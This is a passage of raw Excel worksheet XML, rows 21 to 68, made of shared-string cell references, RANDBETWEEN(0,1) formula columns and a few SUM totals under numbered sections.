        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C21" t="s">
        <v>63</v>
      </c>
      <c r="D21" t="s">
        <v>32</v>
      </c>
      <c r="E21" t="s">
        <v>6</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>64</v>
      </c>
      <c r="G21" t="s">
        <v>65</v>
      </c>
      <c r="H21" t="s">
        <v>66</v>
      </c>
      <c r="J21">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L21">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M21">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:13" ht="47" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B22" t="s">
        <v>67</v>
      </c>
      <c r="C22" t="s">
        <v>68</v>
      </c>
      <c r="D22" t="s">
        <v>32</v>
      </c>
      <c r="E22" t="s">
        <v>6</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>69</v>
      </c>
      <c r="G22" s="1" t="s">
        <v>70</v>
      </c>
      <c r="H22" t="s">
        <v>44</v>
      </c>
      <c r="J22">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L22">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M22">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C23" t="s">
        <v>71</v>
      </c>
      <c r="D23" t="s">
        <v>49</v>
      </c>
      <c r="E23" t="s">
        <v>9</v>
      </c>
      <c r="F23" s="1" t="s">
        <v>72</v>
      </c>
      <c r="G23" t="s">
        <v>73</v>
      </c>
      <c r="J23">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L23">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M23">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:13" ht="58" x14ac:dyDescent="0.35">
      <c r="C24" t="s">
        <v>74</v>
      </c>
      <c r="D24" t="s">
        <v>32</v>
      </c>
      <c r="E24" t="s">
        <v>9</v>
      </c>
      <c r="F24" s="1" t="s">
        <v>75</v>
      </c>
      <c r="G24" s="1" t="s">
        <v>76</v>
      </c>
      <c r="H24" t="s">
        <v>77</v>
      </c>
      <c r="J24">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L24">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M24">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C25" t="s">
        <v>78</v>
      </c>
      <c r="D25" t="s">
        <v>32</v>
      </c>
      <c r="E25" t="s">
        <v>6</v>
      </c>
      <c r="F25" s="1" t="s">
        <v>79</v>
      </c>
      <c r="G25" s="1" t="s">
        <v>80</v>
      </c>
      <c r="H25" t="s">
        <v>81</v>
      </c>
      <c r="J25">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L25">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M25">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:13" ht="58" x14ac:dyDescent="0.35">
      <c r="C26" t="s">
        <v>82</v>
      </c>
      <c r="D26" t="s">
        <v>32</v>
      </c>
      <c r="E26" t="s">
        <v>9</v>
      </c>
      <c r="F26" s="1" t="s">
        <v>83</v>
      </c>
      <c r="G26" s="1" t="s">
        <v>84</v>
      </c>
      <c r="J26">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L26">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M26">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C27" t="s">
        <v>85</v>
      </c>
      <c r="D27" t="s">
        <v>32</v>
      </c>
      <c r="E27" t="s">
        <v>6</v>
      </c>
      <c r="F27" s="1" t="s">
        <v>86</v>
      </c>
      <c r="G27" s="1" t="s">
        <v>87</v>
      </c>
      <c r="J27">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L27">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M27">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:13" ht="33.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C28" t="s">
        <v>88</v>
      </c>
      <c r="D28" t="s">
        <v>32</v>
      </c>
      <c r="E28" t="s">
        <v>6</v>
      </c>
      <c r="F28" s="1" t="s">
        <v>89</v>
      </c>
      <c r="G28" s="1" t="s">
        <v>90</v>
      </c>
      <c r="J28">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L28">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M28">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:13" ht="29" x14ac:dyDescent="0.35">
      <c r="B29" t="s">
        <v>97</v>
      </c>
      <c r="C29" t="s">
        <v>91</v>
      </c>
      <c r="D29" t="s">
        <v>49</v>
      </c>
      <c r="E29" t="s">
        <v>9</v>
      </c>
      <c r="F29" s="1" t="s">
        <v>92</v>
      </c>
      <c r="G29" s="1" t="s">
        <v>93</v>
      </c>
      <c r="J29">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L29">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M29">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:13" x14ac:dyDescent="0.35">
      <c r="C30" t="s">
        <v>94</v>
      </c>
      <c r="D30" t="s">
        <v>49</v>
      </c>
      <c r="E30" t="s">
        <v>9</v>
      </c>
      <c r="F30" s="1" t="s">
        <v>95</v>
      </c>
      <c r="H30" t="s">
        <v>96</v>
      </c>
      <c r="J30">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L30">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M30">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:13" ht="31.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A31" s="3">
        <v>12.02</v>
      </c>
      <c r="B31" t="s">
        <v>98</v>
      </c>
      <c r="C31" t="s">
        <v>100</v>
      </c>
      <c r="D31" t="s">
        <v>49</v>
      </c>
      <c r="E31" t="s">
        <v>9</v>
      </c>
      <c r="F31" s="1" t="s">
        <v>99</v>
      </c>
      <c r="G31" s="1" t="s">
        <v>101</v>
      </c>
      <c r="J31">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L31">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M31">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:13" ht="40.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C32" t="s">
        <v>102</v>
      </c>
      <c r="D32" t="s">
        <v>49</v>
      </c>
      <c r="E32" t="s">
        <v>9</v>
      </c>
      <c r="F32" s="1" t="s">
        <v>103</v>
      </c>
      <c r="G32" s="1" t="s">
        <v>101</v>
      </c>
      <c r="J32">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L32">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M32">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="2:13" ht="29" x14ac:dyDescent="0.35">
      <c r="B33" t="s">
        <v>105</v>
      </c>
      <c r="C33" t="s">
        <v>104</v>
      </c>
      <c r="D33" t="s">
        <v>49</v>
      </c>
      <c r="E33" t="s">
        <v>6</v>
      </c>
      <c r="F33" s="1" t="s">
        <v>106</v>
      </c>
      <c r="J33">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L33">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M33">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="2:13" ht="36" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C34" t="s">
        <v>107</v>
      </c>
      <c r="D34" t="s">
        <v>32</v>
      </c>
      <c r="E34" t="s">
        <v>6</v>
      </c>
      <c r="F34" s="1" t="s">
        <v>108</v>
      </c>
      <c r="G34" t="s">
        <v>109</v>
      </c>
      <c r="H34" s="1" t="s">
        <v>110</v>
      </c>
      <c r="J34">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L34">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M34">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="2:13" x14ac:dyDescent="0.35">
      <c r="C35" t="s">
        <v>111</v>
      </c>
      <c r="D35" t="s">
        <v>32</v>
      </c>
      <c r="E35" t="s">
        <v>6</v>
      </c>
      <c r="F35" s="1" t="s">
        <v>112</v>
      </c>
      <c r="J35">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L35">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M35">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="2:13" x14ac:dyDescent="0.35">
      <c r="B36" t="s">
        <v>277</v>
      </c>
      <c r="C36" t="s">
        <v>384</v>
      </c>
      <c r="D36" t="s">
        <v>49</v>
      </c>
      <c r="E36" t="s">
        <v>9</v>
      </c>
      <c r="F36" s="1" t="s">
        <v>280</v>
      </c>
      <c r="J36">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L36">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M36">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="2:13" ht="26.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B37" t="s">
        <v>113</v>
      </c>
      <c r="C37" t="s">
        <v>343</v>
      </c>
      <c r="D37" t="s">
        <v>32</v>
      </c>
      <c r="E37" t="s">
        <v>9</v>
      </c>
      <c r="F37" s="1" t="s">
        <v>344</v>
      </c>
      <c r="J37">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L37">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M37">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="2:13" ht="26.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C38" t="s">
        <v>347</v>
      </c>
      <c r="D38" t="s">
        <v>49</v>
      </c>
      <c r="E38" t="s">
        <v>9</v>
      </c>
      <c r="F38" s="1" t="s">
        <v>349</v>
      </c>
      <c r="G38" t="s">
        <v>348</v>
      </c>
      <c r="J38">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L38">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M38">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="2:13" ht="26.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C39" t="s">
        <v>346</v>
      </c>
      <c r="D39" t="s">
        <v>32</v>
      </c>
      <c r="E39" t="s">
        <v>9</v>
      </c>
      <c r="F39" s="1" t="s">
        <v>345</v>
      </c>
      <c r="J39">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L39">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M39">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="2:13" ht="58" x14ac:dyDescent="0.35">
      <c r="B40" t="s">
        <v>114</v>
      </c>
      <c r="C40" t="s">
        <v>115</v>
      </c>
      <c r="D40" t="s">
        <v>32</v>
      </c>
      <c r="E40" t="s">
        <v>9</v>
      </c>
      <c r="F40" s="1" t="s">
        <v>116</v>
      </c>
      <c r="H40" t="s">
        <v>117</v>
      </c>
      <c r="J40">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L40">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M40">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="2:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="B41" t="s">
        <v>118</v>
      </c>
      <c r="C41" t="s">
        <v>119</v>
      </c>
      <c r="D41" t="s">
        <v>49</v>
      </c>
      <c r="E41" t="s">
        <v>6</v>
      </c>
      <c r="F41" s="1" t="s">
        <v>120</v>
      </c>
      <c r="J41">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L41">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M41">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="2:13" x14ac:dyDescent="0.35">
      <c r="C42" t="s">
        <v>119</v>
      </c>
      <c r="D42" t="s">
        <v>49</v>
      </c>
      <c r="E42" t="s">
        <v>9</v>
      </c>
      <c r="F42" s="1" t="s">
        <v>121</v>
      </c>
      <c r="J42">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L42">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M42">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="2:13" ht="39" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B43" t="s">
        <v>122</v>
      </c>
      <c r="C43" t="s">
        <v>300</v>
      </c>
      <c r="D43" t="s">
        <v>32</v>
      </c>
      <c r="E43" t="s">
        <v>9</v>
      </c>
      <c r="F43" s="1" t="s">
        <v>301</v>
      </c>
      <c r="H43" t="s">
        <v>127</v>
      </c>
      <c r="J43">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L43">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M43">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="2:13" ht="39" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C44" t="s">
        <v>302</v>
      </c>
      <c r="D44" t="s">
        <v>32</v>
      </c>
      <c r="E44" t="s">
        <v>6</v>
      </c>
      <c r="F44" s="1" t="s">
        <v>303</v>
      </c>
      <c r="H44" t="s">
        <v>304</v>
      </c>
      <c r="J44">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L44">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M44">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="2:13" ht="145" x14ac:dyDescent="0.35">
      <c r="B45" t="s">
        <v>123</v>
      </c>
      <c r="C45" t="s">
        <v>126</v>
      </c>
      <c r="D45" t="s">
        <v>49</v>
      </c>
      <c r="E45" t="s">
        <v>124</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>125</v>
      </c>
      <c r="H45" t="s">
        <v>127</v>
      </c>
      <c r="J45">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L45">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M45">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="2:13" ht="37.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B46" t="s">
        <v>128</v>
      </c>
      <c r="C46" t="s">
        <v>351</v>
      </c>
      <c r="D46" t="s">
        <v>32</v>
      </c>
      <c r="E46" t="s">
        <v>9</v>
      </c>
      <c r="F46" s="1" t="s">
        <v>350</v>
      </c>
      <c r="H46" t="s">
        <v>354</v>
      </c>
      <c r="J46">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L46">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M46">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="2:13" ht="37.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C47" t="s">
        <v>353</v>
      </c>
      <c r="D47" t="s">
        <v>32</v>
      </c>
      <c r="E47" t="s">
        <v>6</v>
      </c>
      <c r="F47" s="1" t="s">
        <v>352</v>
      </c>
      <c r="H47" t="s">
        <v>354</v>
      </c>
      <c r="J47">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L47">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M47">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="2:13" ht="31" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B48" t="s">
        <v>129</v>
      </c>
      <c r="C48" t="s">
        <v>355</v>
      </c>
      <c r="D48" t="s">
        <v>49</v>
      </c>
      <c r="E48" t="s">
        <v>9</v>
      </c>
      <c r="F48" s="1" t="s">
        <v>356</v>
      </c>
      <c r="J48">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L48">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M48">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="B49" t="s">
        <v>130</v>
      </c>
      <c r="C49" t="s">
        <v>357</v>
      </c>
      <c r="D49" t="s">
        <v>49</v>
      </c>
      <c r="E49" t="s">
        <v>9</v>
      </c>
      <c r="F49" s="1" t="s">
        <v>358</v>
      </c>
      <c r="J49">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L49">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M49">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B50" t="s">
        <v>28</v>
      </c>
      <c r="H50" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J50">
        <f ca="1">SUM(J10:J11)</f>
        <v>0</v>
      </c>
      <c r="L50">
        <f ca="1">SUM(L10:L11)</f>
        <v>1</v>
      </c>
      <c r="M50">
        <f ca="1">SUM(M10:M11)</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B51" t="s">
        <v>131</v>
      </c>
      <c r="C51" t="s">
        <v>132</v>
      </c>
      <c r="D51" t="s">
        <v>32</v>
      </c>
      <c r="E51" t="s">
        <v>6</v>
      </c>
      <c r="F51" t="s">
        <v>133</v>
      </c>
      <c r="J51">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L51">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M51">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:13" ht="25.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C52" t="s">
        <v>134</v>
      </c>
      <c r="D52" t="s">
        <v>32</v>
      </c>
      <c r="E52" t="s">
        <v>9</v>
      </c>
      <c r="F52" s="1" t="s">
        <v>135</v>
      </c>
      <c r="J52">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L52">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M52">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:13" ht="35.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C53" t="s">
        <v>136</v>
      </c>
      <c r="D53" t="s">
        <v>32</v>
      </c>
      <c r="E53" t="s">
        <v>9</v>
      </c>
      <c r="F53" s="1" t="s">
        <v>137</v>
      </c>
      <c r="J53">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L53">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M53">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B54" t="s">
        <v>97</v>
      </c>
      <c r="H54" s="5" t="s">
        <v>388</v>
      </c>
      <c r="J54">
        <f ca="1">SUM(J29:J30)</f>
        <v>0</v>
      </c>
      <c r="L54">
        <f ca="1">SUM(L29:L30)</f>
        <v>0</v>
      </c>
      <c r="M54">
        <f ca="1">SUM(M29:M30)</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="B55" t="s">
        <v>138</v>
      </c>
      <c r="C55" t="s">
        <v>139</v>
      </c>
      <c r="D55" t="s">
        <v>49</v>
      </c>
      <c r="E55" t="s">
        <v>6</v>
      </c>
      <c r="F55" s="1" t="s">
        <v>141</v>
      </c>
      <c r="G55" t="s">
        <v>140</v>
      </c>
      <c r="J55">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L55">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M55">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:13" ht="45" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C56" t="s">
        <v>139</v>
      </c>
      <c r="D56" t="s">
        <v>49</v>
      </c>
      <c r="E56" t="s">
        <v>9</v>
      </c>
      <c r="F56" s="1" t="s">
        <v>142</v>
      </c>
      <c r="G56" t="s">
        <v>143</v>
      </c>
      <c r="J56">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L56">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M56">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C57" t="s">
        <v>144</v>
      </c>
      <c r="D57" t="s">
        <v>32</v>
      </c>
      <c r="E57" t="s">
        <v>6</v>
      </c>
      <c r="F57" s="1" t="s">
        <v>145</v>
      </c>
      <c r="G57" t="s">
        <v>146</v>
      </c>
      <c r="J57">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L57">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M57">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:13" ht="50.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A58" s="3">
        <v>12.03</v>
      </c>
      <c r="B58" t="s">
        <v>147</v>
      </c>
      <c r="C58" t="s">
        <v>148</v>
      </c>
      <c r="D58" t="s">
        <v>49</v>
      </c>
      <c r="E58" t="s">
        <v>6</v>
      </c>
      <c r="F58" s="1" t="s">
        <v>149</v>
      </c>
      <c r="G58" t="s">
        <v>150</v>
      </c>
      <c r="J58">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L58">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M58">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:13" ht="45.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C59" t="s">
        <v>151</v>
      </c>
      <c r="D59" t="s">
        <v>49</v>
      </c>
      <c r="E59" t="s">
        <v>9</v>
      </c>
      <c r="F59" s="1" t="s">
        <v>152</v>
      </c>
      <c r="G59" s="1" t="s">
        <v>153</v>
      </c>
      <c r="J59">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L59">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M59">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:13" ht="58" x14ac:dyDescent="0.35">
      <c r="C60" t="s">
        <v>154</v>
      </c>
      <c r="D60" t="s">
        <v>49</v>
      </c>
      <c r="E60" t="s">
        <v>9</v>
      </c>
      <c r="F60" s="1" t="s">
        <v>155</v>
      </c>
      <c r="G60" t="s">
        <v>156</v>
      </c>
      <c r="J60">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L60">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M60">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:13" ht="47.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B61" t="s">
        <v>157</v>
      </c>
      <c r="C61" t="s">
        <v>158</v>
      </c>
      <c r="D61" t="s">
        <v>49</v>
      </c>
      <c r="E61" t="s">
        <v>9</v>
      </c>
      <c r="F61" s="1" t="s">
        <v>159</v>
      </c>
      <c r="J61">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L61">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M61">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:13" ht="32.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C62" t="s">
        <v>158</v>
      </c>
      <c r="D62" t="s">
        <v>49</v>
      </c>
      <c r="E62" t="s">
        <v>124</v>
      </c>
      <c r="F62" s="1" t="s">
        <v>160</v>
      </c>
      <c r="J62">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L62">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M62">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:13" x14ac:dyDescent="0.35">
      <c r="B63" t="s">
        <v>161</v>
      </c>
      <c r="C63" t="s">
        <v>331</v>
      </c>
      <c r="D63" t="s">
        <v>32</v>
      </c>
      <c r="E63" t="s">
        <v>9</v>
      </c>
      <c r="F63" t="s">
        <v>332</v>
      </c>
      <c r="G63" t="s">
        <v>333</v>
      </c>
      <c r="J63">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L63">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M63">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:13" ht="24" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B64" t="s">
        <v>162</v>
      </c>
      <c r="C64" t="s">
        <v>163</v>
      </c>
      <c r="D64" t="s">
        <v>49</v>
      </c>
      <c r="E64" t="s">
        <v>9</v>
      </c>
      <c r="F64" s="1" t="s">
        <v>164</v>
      </c>
      <c r="J64">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L64">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M64">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="2:13" ht="35" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C65" t="s">
        <v>165</v>
      </c>
      <c r="D65" t="s">
        <v>49</v>
      </c>
      <c r="E65" t="s">
        <v>9</v>
      </c>
      <c r="F65" s="1" t="s">
        <v>166</v>
      </c>
      <c r="H65" t="s">
        <v>167</v>
      </c>
      <c r="J65">
        <f t="shared" ref="J65:J128" ca="1" si="2">RANDBETWEEN(0,1)</f>
        <v>0</v>
      </c>
      <c r="L65">
        <f t="shared" ref="L65:M128" ca="1" si="3">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
      <c r="M65">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="2:13" ht="43.5" x14ac:dyDescent="0.35">
      <c r="B66" t="s">
        <v>168</v>
      </c>
      <c r="C66" t="s">
        <v>169</v>
      </c>
      <c r="D66" t="s">
        <v>49</v>
      </c>
      <c r="E66" t="s">
        <v>9</v>
      </c>
      <c r="F66" s="1" t="s">
        <v>171</v>
      </c>
      <c r="G66" t="s">
        <v>170</v>
      </c>
      <c r="J66">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L66">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
      <c r="M66">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="67" spans="2:13" ht="29" x14ac:dyDescent="0.35">
      <c r="C67" t="s">
        <v>172</v>
      </c>
      <c r="D67" t="s">
        <v>49</v>
      </c>
      <c r="E67" t="s">
        <v>6</v>
      </c>
      <c r="F67" s="1" t="s">
        <v>173</v>
      </c>
      <c r="G67" t="s">
        <v>174</v>
      </c>
      <c r="J67">
        <f t="shared" ca="1" si="2"/>
        <v>1</v>
      </c>
      <c r="L67">
        <f t="shared" ca="1" si="3"/>
        <v>1</v>
      </c>
      <c r="M67">
        <f t="shared" ca="1" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="2:13" ht="87" x14ac:dyDescent="0.35">
      <c r="B68" t="s">
        <v>175</v>
      </c>
